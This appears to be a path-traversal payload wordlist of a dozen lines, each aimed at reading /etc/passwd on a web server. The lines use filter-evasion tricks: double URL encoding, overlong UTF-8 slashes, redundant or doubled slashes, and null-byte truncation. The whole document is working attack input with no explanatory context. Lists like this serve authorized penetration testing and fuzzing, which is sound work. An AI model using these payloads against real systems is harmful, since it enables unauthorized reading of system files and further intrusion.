../../../../../../../etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..///////..////..////..///etc/passwd
....//....//....//....//etc/passwd
../../../../../../../etc/passwd%00
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
..///////..////..////..///etc/passwd%00
....//....//....//....//etc/passwd%00
